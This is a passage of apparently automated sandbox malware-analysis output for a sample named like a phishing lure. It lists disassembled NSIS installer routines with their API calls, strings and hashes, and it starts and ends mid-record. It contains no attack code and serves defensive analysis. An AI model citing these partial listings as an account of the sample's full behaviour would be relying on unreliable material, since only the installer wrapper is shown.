                                                                                                                                  • Part of subcall function 004056AA: GetDlgItemTextW.USER32(?,?,00000400,00404786), ref: 004056BD
                                                                                                                                  • Part of subcall function 0040617E: CharNextW.USER32(?,*?|<>/":,00000000,00434000,00436800,00436800,00000000,00403332,00436800,771B3420,00403512), ref: 004061E1
                                                                                                                                  • Part of subcall function 0040617E: CharNextW.USER32(?,?,?,00000000), ref: 004061F0
                                                                                                                                  • Part of subcall function 0040617E: CharNextW.USER32(?,00434000,00436800,00436800,00000000,00403332,00436800,771B3420,00403512), ref: 004061F5
                                                                                                                                  • Part of subcall function 0040617E: CharPrevW.USER32(?,?,00436800,00436800,00000000,00403332,00436800,771B3420,00403512), ref: 00406208
                                                                                                                                • GetDiskFreeSpaceW.KERNEL32(004206A0,?,?,0000040F,?,004206A0,004206A0,?,00000000,004206A0,?,?,000003FB,?), ref: 00404810
                                                                                                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040482B
                                                                                                                                • SetDlgItemTextW.USER32(00000000,00000400,00420690), ref: 004048B1
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2533024279.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 0000000A.00000002.2532989816.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533071298.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533102279.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                                                                                                • String ID: A
                                                                                                                                • API String ID: 2246997448-3554254475
                                                                                                                                • Opcode ID: 7bae5448d950fa7fc9b780a264b0000045a755fe0574635acf906d6e28ab15ff
                                                                                                                                • Instruction ID: fc6e5784adbf23f3bf0ca4204261aafad130db7b69f5cfc08d06a9dfd3cb4e02
                                                                                                                                • Opcode Fuzzy Hash: 7bae5448d950fa7fc9b780a264b0000045a755fe0574635acf906d6e28ab15ff
                                                                                                                                • Instruction Fuzzy Hash: 1B916FB2900209ABDB11AFA1CC85AAF77B8EF85354F10847BF701B72D1D77C99418B69
                                                                                                                                APIs
                                                                                                                                • GetTickCount.KERNEL32 ref: 00402DD0
                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,00437800,00000400), ref: 00402DEC
                                                                                                                                  • Part of subcall function 00405B56: GetFileAttributesW.KERNEL32(00000003,00402DFF,00437800,80000000,00000003), ref: 00405B5A
                                                                                                                                  • Part of subcall function 00405B56: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7C
                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,00435800,00435800,00437800,00437800,80000000,00000003), ref: 00402E35
                                                                                                                                • GlobalAlloc.KERNEL32(00000040,00409230), ref: 00402F7C
                                                                                                                                Strings
                                                                                                                                • soft, xrefs: 00402EAC
                                                                                                                                • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402FC5
                                                                                                                                • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403013
                                                                                                                                • Null, xrefs: 00402EB5
                                                                                                                                • Inst, xrefs: 00402EA3
                                                                                                                                • Error launching installer, xrefs: 00402E0C
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2533024279.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 0000000A.00000002.2532989816.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533071298.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533102279.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                                • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                • API String ID: 2803837635-787788815
                                                                                                                                • Opcode ID: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
                                                                                                                                • Instruction ID: 37f794aabb7b6cc22e4429bd010eaec377b65274dead3bcbf73b1a6bf24b43e2
                                                                                                                                • Opcode Fuzzy Hash: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
                                                                                                                                • Instruction Fuzzy Hash: FB610571940205ABDB20AF65DD89BAE3AB8EB04359F20417BF505B32D1C7BC9E41DB9C
                                                                                                                                APIs
                                                                                                                                • GetVersion.KERNEL32(00000000,004216B0,?,004051CB,004216B0,00000000,00000000,00000000), ref: 00405FCF
                                                                                                                                • GetSystemDirectoryW.KERNEL32(00427180,00000400), ref: 0040604D
                                                                                                                                • GetWindowsDirectoryW.KERNEL32(00427180,00000400), ref: 00406060
                                                                                                                                • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 0040609C
                                                                                                                                • SHGetPathFromIDListW.SHELL32(?,00427180), ref: 004060AA
                                                                                                                                • CoTaskMemFree.OLE32(?), ref: 004060B5
                                                                                                                                • lstrcatW.KERNEL32(00427180,\Microsoft\Internet Explorer\Quick Launch), ref: 004060D9
                                                                                                                                • lstrlenW.KERNEL32(00427180,00000000,004216B0,?,004051CB,004216B0,00000000,00000000,00000000), ref: 00406133
                                                                                                                                Strings
                                                                                                                                • Software\Microsoft\Windows\CurrentVersion, xrefs: 0040601B
                                                                                                                                • \Microsoft\Internet Explorer\Quick Launch, xrefs: 004060D3
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2533024279.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 0000000A.00000002.2532989816.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533071298.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533102279.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                • API String ID: 900638850-730719616
                                                                                                                                • Opcode ID: 6742d19b0b1c5090879c3cfba661a75a2238e305d4f85b0b169f5eea2b4c5ff0
                                                                                                                                • Instruction ID: 201fcfe404e7502d8ff22bbbb8bc1db0d7d07a9235330109bbd625d5d43c8b09
                                                                                                                                • Opcode Fuzzy Hash: 6742d19b0b1c5090879c3cfba661a75a2238e305d4f85b0b169f5eea2b4c5ff0
                                                                                                                                • Instruction Fuzzy Hash: 93612371A40516EBDB209F24CC44AAF37A5EF00314F51813BE546BA2E0D73D8AA2CB4E
                                                                                                                                APIs
                                                                                                                                • GetWindowLongW.USER32(?,000000EB), ref: 004041B3
                                                                                                                                • GetSysColor.USER32(00000000), ref: 004041CF
                                                                                                                                • SetTextColor.GDI32(?,00000000), ref: 004041DB
                                                                                                                                • SetBkMode.GDI32(?,?), ref: 004041E7
                                                                                                                                • GetSysColor.USER32(?), ref: 004041FA
                                                                                                                                • SetBkColor.GDI32(?,?), ref: 0040420A
                                                                                                                                • DeleteObject.GDI32(?), ref: 00404224
                                                                                                                                • CreateBrushIndirect.GDI32(?), ref: 0040422E
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2533024279.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 0000000A.00000002.2532989816.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533071298.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533102279.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2320649405-0
                                                                                                                                • Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                                                                                                • Instruction ID: 80eb99ce468fafd782bf4c41e5e54efb1aa93a8fb2f83beca87368335cd0d861
                                                                                                                                • Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                                                                                                • Instruction Fuzzy Hash: B221C6B1904744ABCB219F68DD08B4B7BF8AF40710F04896DF951F26E1C738E944CB65
                                                                                                                                APIs
                                                                                                                                • ReadFile.KERNEL32(?,?,?,?), ref: 004025DB
                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402616
                                                                                                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402639
                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040264F
                                                                                                                                  • Part of subcall function 00405BD9: ReadFile.KERNEL32(00409230,00000000,00000000,00000000,00000000,00413E78,0040BE78,0040330C,00409230,00409230,004031FE,00413E78,00004000,?,00000000,?), ref: 00405BED
                                                                                                                                  • Part of subcall function 00405E31: wsprintfW.USER32 ref: 00405E3E
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2533024279.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 0000000A.00000002.2532989816.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533071298.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533102279.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: File$ByteCharMultiReadWide$Pointerwsprintf
                                                                                                                                • String ID: 9
                                                                                                                                • API String ID: 1149667376-2366072709
                                                                                                                                • Opcode ID: 5bf3696fc1b43342bc1c7e4b21794d67987bb543e605c58fae928a8d5a7d4e33
                                                                                                                                • Instruction ID: 2cb5264777941c8734ead6492e5e892e31f06070e548dc8493562ac8cc7c1c9a
                                                                                                                                • Opcode Fuzzy Hash: 5bf3696fc1b43342bc1c7e4b21794d67987bb543e605c58fae928a8d5a7d4e33
                                                                                                                                • Instruction Fuzzy Hash: B551E971E04209ABDF24DF94DE88AAEB779FF04304F50443BE501B62D0D7B99A42CB69
                                                                                                                                APIs
                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 00402809
                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402825
                                                                                                                                • GlobalFree.KERNEL32(FFFFFD66), ref: 0040285E
                                                                                                                                • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402870
                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00402877
                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,000000F0), ref: 0040288F
                                                                                                                                • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 004028A3
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2533024279.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 0000000A.00000002.2532989816.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533071298.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533102279.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3294113728-0
                                                                                                                                • Opcode ID: 120950de23c25218e4c137f2e62925978e01813800c9cf407bd4cdabe4d04e4e
                                                                                                                                • Instruction ID: c52f99eb37a0f9a93b384f1dc8ea19ce670fa72408cf6cd502fc0ac50d833161
                                                                                                                                • Opcode Fuzzy Hash: 120950de23c25218e4c137f2e62925978e01813800c9cf407bd4cdabe4d04e4e
                                                                                                                                • Instruction Fuzzy Hash: AC31A072C00118BBDF11AFA5CE49DAF7E79EF05364F20423AF510762E1C6796E418BA9
                                                                                                                                APIs
                                                                                                                                • lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
                                                                                                                                • lstrlenW.KERNEL32(00402D94,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
                                                                                                                                • lstrcatW.KERNEL32(004216B0,00402D94,00402D94,004216B0,00000000,00000000,00000000), ref: 004051EF
                                                                                                                                • SetWindowTextW.USER32(004216B0,004216B0), ref: 00405201
                                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
                                                                                                                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
                                                                                                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2533024279.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 0000000A.00000002.2532989816.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533071298.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533102279.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2531174081-0
                                                                                                                                • Opcode ID: aabeaaca48730acbc73074f8e678aaac97ab8e564c9cd04649984117108eee2c
                                                                                                                                • Instruction ID: f08454111491fc0d39351af24b8902c1f97f976603b555b028d64c931b302e29
                                                                                                                                • Opcode Fuzzy Hash: aabeaaca48730acbc73074f8e678aaac97ab8e564c9cd04649984117108eee2c
                                                                                                                                • Instruction Fuzzy Hash: 42219D71900518BACB119FA5DD84ADFBFB8EF44354F54807AF904B62A0C7798A41DFA8
                                                                                                                                APIs
                                                                                                                                • DestroyWindow.USER32(?,00000000), ref: 00402D35
                                                                                                                                • GetTickCount.KERNEL32 ref: 00402D53
                                                                                                                                • wsprintfW.USER32 ref: 00402D81
                                                                                                                                  • Part of subcall function 00405194: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
                                                                                                                                  • Part of subcall function 00405194: lstrlenW.KERNEL32(00402D94,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
                                                                                                                                  • Part of subcall function 00405194: lstrcatW.KERNEL32(004216B0,00402D94,00402D94,004216B0,00000000,00000000,00000000), ref: 004051EF
                                                                                                                                  • Part of subcall function 00405194: SetWindowTextW.USER32(004216B0,004216B0), ref: 00405201
                                                                                                                                  • Part of subcall function 00405194: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
                                                                                                                                  • Part of subcall function 00405194: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
                                                                                                                                  • Part of subcall function 00405194: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
                                                                                                                                • CreateDialogParamW.USER32(0000006F,00000000,00402C7F,00000000), ref: 00402DA5
                                                                                                                                • ShowWindow.USER32(00000000,00000005), ref: 00402DB3
                                                                                                                                  • Part of subcall function 00402CFE: MulDiv.KERNEL32(?,00000064,?), ref: 00402D13
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2533024279.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 0000000A.00000002.2532989816.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533071298.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533102279.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                                                • String ID: ... %d%%
                                                                                                                                • API String ID: 722711167-2449383134
                                                                                                                                • Opcode ID: 37da5e6e22464c23d40ec4d31b3b8eabf55409bf9acffd0f2ef74a8860773cf4
                                                                                                                                • Instruction ID: 10fb19a6c4b2eae8d62923eb178f02f9fc5b3c6af7becd3ce095817841e91703
                                                                                                                                • Opcode Fuzzy Hash: 37da5e6e22464c23d40ec4d31b3b8eabf55409bf9acffd0f2ef74a8860773cf4
                                                                                                                                • Instruction Fuzzy Hash: 2901A130949220EBD7626B60AF1DAEA3B68EF01704F1445BBF901B11E0C6FC9D01CA9E
                                                                                                                                APIs
                                                                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A79
                                                                                                                                • GetMessagePos.USER32 ref: 00404A81
                                                                                                                                • ScreenToClient.USER32(?,?), ref: 00404A9B
                                                                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404AAD
                                                                                                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AD3
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2533024279.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 0000000A.00000002.2532989816.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533071298.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533102279.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Message$Send$ClientScreen
                                                                                                                                • String ID: f
                                                                                                                                • API String ID: 41195575-1993550816
                                                                                                                                • Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                                                                                                • Instruction ID: cab112d5f89b67c13374b27971796476edbf79a01bfb7ffc6895eaaae0ed81f2
                                                                                                                                • Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                                                                                                • Instruction Fuzzy Hash: 1C014C71E40219BADB00DB94DD85BFEBBB8AB55715F10012ABB11B61C0C7B4A9018BA5
                                                                                                                                APIs
                                                                                                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C9D
                                                                                                                                • wsprintfW.USER32 ref: 00402CD1
                                                                                                                                • SetWindowTextW.USER32(?,?), ref: 00402CE1
                                                                                                                                • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF3
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2533024279.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 0000000A.00000002.2532989816.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533071298.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533102279.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                                                • API String ID: 1451636040-1158693248
                                                                                                                                • Opcode ID: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
                                                                                                                                • Instruction ID: 78b67de6d16717a489960d5e53e23e1f77e1f7f38f635152e8b2699b13fa448d
                                                                                                                                • Opcode Fuzzy Hash: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
                                                                                                                                • Instruction Fuzzy Hash: EAF06270504108ABEF205F50CD4ABAE3768BB00309F00803AFA16B91D0CBF95959DF59
                                                                                                                                APIs
                                                                                                                                • GetTickCount.KERNEL32 ref: 00403192
                                                                                                                                  • Part of subcall function 0040330F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000), ref: 004031C5
                                                                                                                                • WriteFile.KERNEL32(0040BE78,?,00000000,00000000,00413E78,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?), ref: 0040327F
                                                                                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00413E78,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E), ref: 004032D1
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2533024279.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 0000000A.00000002.2532989816.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533071298.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533102279.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: File$Pointer$CountTickWrite
                                                                                                                                • String ID: x>A
                                                                                                                                • API String ID: 2146148272-3854404225
                                                                                                                                • Opcode ID: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
                                                                                                                                • Instruction ID: e2b2982e6b1d623d5d036838b7619e310c478df2cbc778b1b7af49cc7c53be0d
                                                                                                                                • Opcode Fuzzy Hash: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
                                                                                                                                • Instruction Fuzzy Hash: 2A41AC72504201DFDB10AF29ED848A63BACFB54315720827FE910B22E0D7799D81DBED
                                                                                                                                APIs
                                                                                                                                • CharNextW.USER32(?,*?|<>/":,00000000,00434000,00436800,00436800,00000000,00403332,00436800,771B3420,00403512), ref: 004061E1
                                                                                                                                • CharNextW.USER32(?,?,?,00000000), ref: 004061F0
                                                                                                                                • CharNextW.USER32(?,00434000,00436800,00436800,00000000,00403332,00436800,771B3420,00403512), ref: 004061F5
                                                                                                                                • CharPrevW.USER32(?,?,00436800,00436800,00000000,00403332,00436800,771B3420,00403512), ref: 00406208
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2533024279.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 0000000A.00000002.2532989816.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533071298.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533102279.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
